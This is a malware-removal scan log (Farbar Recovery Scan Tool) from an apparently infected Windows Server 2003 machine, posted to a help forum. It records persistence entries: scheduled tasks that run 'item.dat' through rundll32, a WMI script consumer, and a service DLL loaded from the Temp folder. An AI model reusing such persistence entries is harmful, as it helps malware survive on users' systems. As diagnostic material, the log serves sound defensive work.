NETSVCx32: DMServer -> C:\Windows\SysWOW64\dmserver.dll ==> No File
NETSVCx32: EventSystem -> C:\WINDOWS\SysWOW64\es.dll (Microsoft Corporation)
NETSVCx32: HidServ -> C:\Windows\SysWOW64\hidserv.dll ==> No File
NETSVCx32: Iprip -> C:\WINDOWS\Temp\ntshrui.dll (Microsoft Corporation)
NETSVCx32: LanmanWorkstation -> C:\Windows\SysWOW64\wkssvc.dll ==> No File
NETSVCx32: Messenger -> no filepath.
NETSVCx32: Netman -> C:\Windows\SysWOW64\netman.dll (Microsoft Corporation)
NETSVCx32: Sacsvr -> no filepath.
NETSVCx32: Seclogon -> C:\Windows\SysWOW64\seclogon.dll (Microsoft Corporation)
NETSVCx32: TrkWks -> C:\Windows\SysWOW64\trkwks.dll (Microsoft Corporation)
NETSVCx32: TrkSvr -> no filepath.
NETSVCx32: WZCSVC -> C:\Windows\SysWOW64\wzcsvc.dll (Microsoft Corporation)
NETSVCx32: xmlprov -> no filepath.

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-06-01 17:05 - 2017-06-01 17:06 - 00000000 ____D C:\FRST
2017-05-23 04:48 - 2017-05-24 13:48 - 00000414 _____ C:\WINDOWS\Tasks\Mysa2.job
2017-05-22 13:48 - 2017-05-24 13:48 - 00000334 _____ C:\WINDOWS\Tasks\Mysa1.job
2017-05-18 22:05 - 2017-06-01 17:07 - 00000000 ____D C:\Documents and Settings\Administrator.ART\Local Settings\Temp\1
2017-05-18 20:39 - 2017-05-18 20:49 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-05-18 17:03 - 2017-05-18 21:41 - 00121560 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2017-05-18 16:58 - 2017-05-18 16:58 - 00000772 _____ C:\Documents and Settings\All Users\Start Menu\Programs\Mozilla Firefox.lnk
2017-05-18 16:58 - 2017-05-18 16:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-18 16:58 - 2017-05-18 16:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-18 16:58 - 2017-05-18 16:58 - 00000000 ____D C:\Documents and Settings\Administrator.ART\Application Data\Mozilla
2017-05-18 15:37 - 2017-05-18 15:37 - 00000000 ____D C:\Documents and Settings\All Users\Start Menu\Programs\TightVNC
2017-05-18 15:36 - 2017-05-18 15:37 - 00000000 ____D C:\Program Files\TightVNC
2017-05-18 15:36 - 2017-05-18 15:36 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\TightVNC
2017-05-18 15:34 - 2017-05-18 15:32 - 02191360 _____ C:\Documents and Settings\Administrator\Desktop\tightvnc-2.8.8-gpl-setup-64bit (1).msi
2017-05-18 15:29 - 2017-05-18 17:21 - 19607208 _____ (RealVNC Ltd ) C:\Documents and Settings\Administrator\Desktop\VNC-6.1.0-Windows.exe
2017-05-18 15:29 - 2017-05-18 15:26 - 19576625 _____ C:\Documents and Settings\Administrator\Desktop\VNC-6.1.0-Windows.zip
2017-05-18 15:17 - 2017-05-18 15:17 - 00000000 ____D C:\Documents and Settings\Administrator\Application Data\.clamwin
2017-05-18 14:38 - 2017-05-18 14:38 - 02494560 _____ C:\Documents and Settings\Administrator.ART\Local Settings\Temp\xfB.tmp
2017-05-16 14:37 - 2017-05-16 15:23 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\RogueKiller
2017-05-16 14:37 - 2017-05-16 14:37 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-05-16 08:31 - 2017-05-16 08:31 - 00000000 ____D C:\Documents and Settings\Administrator.ART\Application Data\Curiolab
2017-05-15 20:45 - 2017-05-15 20:45 - 00000638 _____ C:\Documents and Settings\Administrator.ART\Desktop\Shortcut to mbar.lnk
2017-05-15 20:43 - 2017-05-15 20:43 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\AVAST Software
2017-05-15 20:05 - 2017-05-15 20:05 - 00000678 _____ C:\Documents and Settings\Administrator.ART\Desktop\Shortcut to Tcpview.lnk
2017-05-15 19:58 - 2017-06-01 17:06 - 00000000 ____D C:\Documents and Settings\Administrator.ART\Desktop\tools
2017-05-15 16:49 - 2017-05-15 16:49 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\ESET
2017-05-15 16:02 - 2017-05-18 17:48 - 00000000 ____D C:\AdwCleaner
2017-05-15 15:27 - 2017-05-15 15:27 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\HitmanPro
2017-05-15 15:21 - 2017-06-01 17:07 - 61818538 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2017-05-15 15:21 - 2017-06-01 17:06 - 58802247 _____ C:\WINDOWS\ZAM.krnl.trace
2017-05-15 15:21 - 2017-05-15 15:21 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zam64.sys
2017-05-15 15:20 - 2017-05-15 15:20 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zamguard64.sys
2017-05-15 14:20 - 2017-05-15 14:20 - 00000000 ____D C:\Documents and Settings\All Users\Start Menu\Programs\VMware
2017-05-15 14:19 - 2017-05-15 14:19 - 00000000 ____D C:\Program Files (x86)\VMware
2017-05-15 10:54 - 2015-05-13 18:03 - 00001592 _____ C:\Documents and Settings\Administrator.ART\Desktop\Event Viewer.lnk
2017-05-15 10:46 - 2017-05-15 15:05 - 00000060 _____ C:\WINDOWS\system32\s
2017-05-15 09:58 - 2017-05-15 09:58 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\Norton
2017-05-12 16:36 - 2017-05-12 16:36 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-05-12 16:28 - 2017-05-12 16:35 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\VMware
2017-05-12 14:45 - 2017-05-15 10:46 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-12 14:45 - 2017-05-12 16:36 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2017-05-12 14:45 - 2017-05-12 14:45 - 00065536 _____ C:\WINDOWS\system32\config\SpybotSD.evt
2017-05-12 14:34 - 2017-05-12 14:34 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\Avg
2017-05-11 12:10 - 2017-05-11 12:10 - 00000005 _____ C:\WINDOWS\system32\1.txt
2017-05-10 19:46 - 2017-05-10 19:46 - 00136688 _____ C:\WINDOWS\Minidump\Mini051017-01.dmp
2017-05-10 19:46 - 2017-05-10 19:46 - 00000000 ____D C:\WINDOWS\Minidump
2017-05-02 23:34 - 2017-05-02 23:34 - 00000000 ____D C:\Program Files\Microsoft Updates

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-06-01 17:03 - 2013-11-14 09:59 - 00000240 _____ C:\WINDOWS\system32\config\netlogon.ftl
2017-05-18 22:04 - 2017-02-17 18:26 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\Malwarebytes' Anti-Malware (portable)
2017-05-18 22:04 - 2013-11-13 15:14 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-18 22:02 - 2013-11-14 10:02 - 00000178 ___SH C:\Documents and Settings\Administrator.ART\ntuser.ini
2017-05-18 22:02 - 2013-11-13 15:14 - 00032472 _____ C:\WINDOWS\Tasks\SchedLgU.Txt
2017-05-18 21:16 - 2015-05-13 21:29 - 00000000 __HDC C:\WINDOWS\$NtUninstallKB926122$
2017-05-18 17:02 - 2015-05-13 20:16 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\Malwarebytes
2017-05-18 16:24 - 2013-11-13 02:33 - 00000000 ____D C:\Documents and Settings
2017-05-18 16:13 - 2013-11-13 02:33 - 00000000 ____D C:\Documents and Settings\All Users
2017-05-18 16:10 - 2013-11-13 15:15 - 00000178 ___SH C:\Documents and Settings\Administrator\ntuser.ini
2017-05-18 15:57 - 2015-05-13 09:49 - 00000440 __RSH C:\Documents and Settings\Administrator\ntuser.pol
2017-05-18 15:57 - 2013-11-13 15:15 - 00000000 ____D C:\Documents and Settings\Administrator
2017-05-18 14:26 - 2007-02-18 05:00 - 00002206 _____ C:\WINDOWS\system32\wpa.dbl
2017-05-15 21:21 - 2013-11-13 02:21 - 00000000 RSHDC C:\WINDOWS\system32\dllcache
2017-05-15 16:14 - 2014-12-15 20:08 - 00000000 ____D C:\Documents and Settings\Administrator.ART\Application Data\Wireshark
2017-05-15 15:22 - 2013-11-14 16:31 - 00000664 _____ C:\WINDOWS\SysWOW64\d3d9caps.dat
2017-05-15 14:20 - 2013-11-14 10:19 - 00001024 _____ C:\.rnd
2017-05-12 16:41 - 2013-11-13 02:21 - 00000000 ____D C:\WINDOWS\repair
2017-05-10 19:46 - 2013-11-13 02:21 - 934907904 _____ C:\WINDOWS\MEMORY.DMP
2017-05-08 19:37 - 2013-11-13 02:35 - 00357316 _____ C:\WINDOWS\system32\PerfStringBackup.INI

==================== Files in the root of some directories =======

2013-11-19 13:55 - 2015-10-29 14:00 - 0258256 _____ () C:\Program Files\BAFWrapper.log
2015-05-07 15:26 - 2015-05-07 15:26 - 0000218 ____N () C:\Documents and Settings\Administrator.ART\Local Settings\Application Data\recently-used.xbel

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe IS MISSING <==== ATTENTION
C:\WINDOWS\SysWOW64\wininit.exe IS MISSING <==== ATTENTION
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
C:\WINDOWS\system32\codeintegrity\Bootcat.cache IS MISSING <==== ATTENTION


ATTENTION: ==> Could not access BCD.

==================== End of FRST.txt ============================

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-05-2017
Ran by Administrator (01-06-2017 17:07:23)
Running from C:\Documents and Settings\Administrator.ART\Desktop\tools
Microsoft Windows Server 2003 Service Pack 2 (X64) (2013-11-13 22:12:29)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2969604724-871335673-3114479108-500 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Administrator
Guest (S-1-5-21-2969604724-871335673-3114479108-501 - Limited - Disabled)
SUPPORT_388945a0 (S-1-5-21-2969604724-871335673-3114479108-1001 - Limited - Disabled)
___VMware_Conv_SA___ (S-1-5-21-2969604724-871335673-3114479108-1009 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)


==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

CA ARCserve Backup (HKLM-x32\...\CA ARCserve Backup) (Version: 16.0.6838 - CA, Inc.)
CA ARCserve Backup Agent for Open Files for Windows (HKLM\...\{CAABDD41-1935-4C04-AE4B-803EF455E1A3}) (Version: 16.0.6838 - CA, Inc.)
CA ARCserve Backup Client Agent for Windows (Version: 16.0.6838 - CA, Inc.) Hidden
CA ARCserve Backup Setup Support Files (x32 Version: 16.0.6838 - CA, Inc.) Hidden
CA ARCserve Discovery Service (x32 Version: 16.0.6838 - CA, Inc.) Hidden
CA ARCserve Universal Agent (Version: 16.0.6838 - CA, Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Intel® Network Connections 18.3.62.0 (HKLM\...\{FCF3ECF7-7AE0-4E26-B387-09A3A80B79CC}) (Version: 18.3.62.0 - Intel)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation)
Mozilla Firefox 52.1.1 ESR (x86 en-US) (HKLM-x32\...\Mozilla Firefox 52.1.1 ESR (x86 en-US)) (Version: 52.1.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.1.1 - Mozilla)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.5.1 - Notepad++ Team)
TightVNC (HKLM\...\{DEE0B752-52D8-4615-9BEE-1EDA46628960}) (Version: 2.8.8.0 - GlavSoft LLC.)
Update for Windows Internet Explorer 8 (KB3074886) (HKLM\...\KB3074886-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 8 (KB982632) (HKLM\...\KB982632-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2345886) (HKLM\...\KB2345886) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2467659) (HKLM\...\KB2467659) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2748349) (HKLM\...\KB2748349) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2749655) (HKLM\...\KB2749655) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2981580) (HKLM\...\KB2981580) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2993651) (HKLM\...\KB2993651) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB3065979) (HKLM\...\KB3065979) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB936357) (HKLM\...\KB936357) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB948496) (HKLM\...\KB948496) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB973825) (HKLM\...\KB973825) (Version: 1 - Microsoft Corporation)
VC_CRT_x64 (Version: 1.02.0000 - Intel Corporation) Hidden
VMware vCenter Converter Standalone (HKLM-x32\...\{2BCC4907-4205-4338-BDA5-94F183144C35}) (Version: 5.5.3.2183569 - VMware, Inc.)
Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140744 - Microsoft Corporation)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
Wireshark 1.12.2 (64-bit) (HKLM-x32\...\Wireshark) (Version: 1.12.2 - The Wireshark developer community, hxxp://www.wireshark.org)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Mysa1.job => rundll32.exe  c:\windows\debug\item.dat,ServiceMain aaaa rundll32.exe
Task: C:\WINDOWS\Tasks\Mysa2.job => c:\windows\debug\item.dat

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

WMI_ActiveScriptEventConsumer_bleepyoumm2_consumer:

==================== Loaded Modules (Whitelisted) ==============

2014-10-03 18:02 - 2014-10-03 18:02 - 00086744 _____ () C:\Program Files (x86)\VMware\VMware vCenter Converter Standalone\mspack.dll
2014-10-03 18:00 - 2014-10-03 18:00 - 01297624 _____ () C:\Program Files (x86)\VMware\VMware vCenter Converter Standalone\libxml2.dll
2014-10-03 18:00 - 2014-10-03 18:00 - 00542936 _____ () C:\Program Files (x86)\VMware\VMware vCenter Converter Standalone\sqlite3.dll

==================== Alternate Data Streams (Whitelisted) =========

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Iprip => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wd.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\UploadMgr => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKLM\...\batfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <===== ATTENTION
HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2007-02-18 05:00 - 2007-02-18 05:00 - 00000734 ____N C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2052111302-57989841-725345543-500\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-2969604724-871335673-3114479108-1007\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-2969604724-871335673-3114479108-500\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 10.10.10.230 - 10.10.10.231
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: )
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
bfe => Firewall Service is not running.
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

DomainProfile\AuthorizedApplications: [C:\WINDOWS\SysWOW64\rundll32.exe] => Enabled:rundll32
DomainProfile\AuthorizedApplications: [C:\Program Files\TightVNC\tvnserver.exe] => Enabled:TightVNC
DomainProfile\AuthorizedApplications: [C:\Program Files\TightVNC\tvnviewer.exe] => Enabled:TightVNC
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\Mozilla Firefox\firefox.exe] => Enabled:Firefox (C:\Program Files (x86)\Mozilla Firefox)
DomainProfile\GloballyOpenPorts: [9089:TCP] => Enabled:VMware vCenter Converter Standalone - Agent
DomainProfile\GloballyOpenPorts: [139:TCP] => :LocalSubNet:Disabled:@xpsp2res.dll,-22004
DomainProfile\GloballyOpenPorts: [445:TCP] => :LocalSubNet:Disabled:@xpsp2res.dll,-22005
DomainProfile\GloballyOpenPorts: [137:UDP] => :LocalSubNet:Disabled:@xpsp2res.dll,-22001
DomainProfile\GloballyOpenPorts: [138:UDP] => :LocalSubNet:Disabled:@xpsp2res.dll,-22002

==================== Restore Points =========================

ATTENTION: System Restore is disabled
Check "winmgmt" service or repair WMI.


==================== Faulty Device Manager Devices =============

Name: Microsoft PS/2 Mouse
Description: Microsoft PS/2 Mouse
Class Guid: {4D36E96F-E325-11CE-BFC1-08002BE10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: Standard 101/102-Key or Microsoft Natural PS/2 Keyboard
Description: Standard 101/102-Key or Microsoft Natural PS/2 Keyboard
Class Guid: {4D36E96B-E325-11CE-BFC1-08002BE10318}
Manufacturer: (Standard keyboards)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: SM Bus Controller
Description: SM Bus Controller
Class Guid: {4D36E97E-E325-11CE-BFC1-08002BE10318}
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (06/01/2017 05:07:01 PM) (Source: crypt32) (EventID: 8) (User: )
Description: Failed auto update retrieval of third-party root list sequence number from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt> with error: The specified server cannot perform the requested operation.

Error: (06/01/2017 05:07:01 PM) (Source: crypt32) (EventID: 11) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (06/01/2017 05:07:01 PM) (Source: crypt32) (EventID: 8) (User: )
Description: Failed auto update retrieval of third-party root list sequence number from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt> with error: The specified server cannot perform the requested operation.

Error: (06/01/2017 05:07:01 PM) (Source: crypt32) (EventID: 11) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (06/01/2017 05:06:59 PM) (Source: crypt32) (EventID: 8) (User: )
Description: Failed auto update retrieval of third-party root list sequence number from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt> with error: The specified server cannot perform the requested operation.

Error: (06/01/2017 05:06:59 PM) (Source: crypt32) (EventID: 11) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (06/01/2017 05:06:59 PM) (Source: crypt32) (EventID: 8) (User: )
Description: Failed auto update retrieval of third-party root list sequence number from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt> with error: The specified server cannot perform the requested operation.

Error: (06/01/2017 05:06:59 PM) (Source: crypt32) (EventID: 11) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (06/01/2017 05:06:59 PM) (Source: crypt32) (EventID: 8) (User: )
Description: Failed auto update retrieval of third-party root list sequence number from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt> with error: The specified server cannot perform the requested operation.

Error: (06/01/2017 05:06:59 PM) (Source: crypt32) (EventID: 11) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.


System errors:
=============
Error: (05/31/2017 10:41:58 PM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 07:09:34 PM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 04:33:43 PM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 03:13:29 PM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 02:10:34 PM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 01:09:10 PM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 11:42:51 AM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 10:25:36 AM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 09:23:10 AM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 08:17:01 AM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50


==================== Memory info ===========================

Processor: Intel® Xeon® CPU E5410 @ 2.33GHz
Percentage of memory in use: 82%
Total physical RAM: 4089.64 MB
Available physical RAM: 727.33 MB
Total Virtual: 5866.99 MB
Available Virtual: 3320.32 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:139.73 GB) (Free:88.07 GB) NTFS
Drive g: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive h: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive j: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive l: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive o: () (Network) (Total:4095.87 GB) (Free:2237.88 GB)
Drive p: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive r: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive w: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive y: () (Network) (Total:140 GB) (Free:120.39 GB)
Drive z: () (Network) (Total:4095.87 GB) (Free:2237.88 GB)

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows XP) (Size: 139.7 GB) (Disk ID: CAF58B24)
Partition 1: (Active) - (Size=139.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


Edited by jtcote, 02 June 2017 - 10:20 AM.





1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users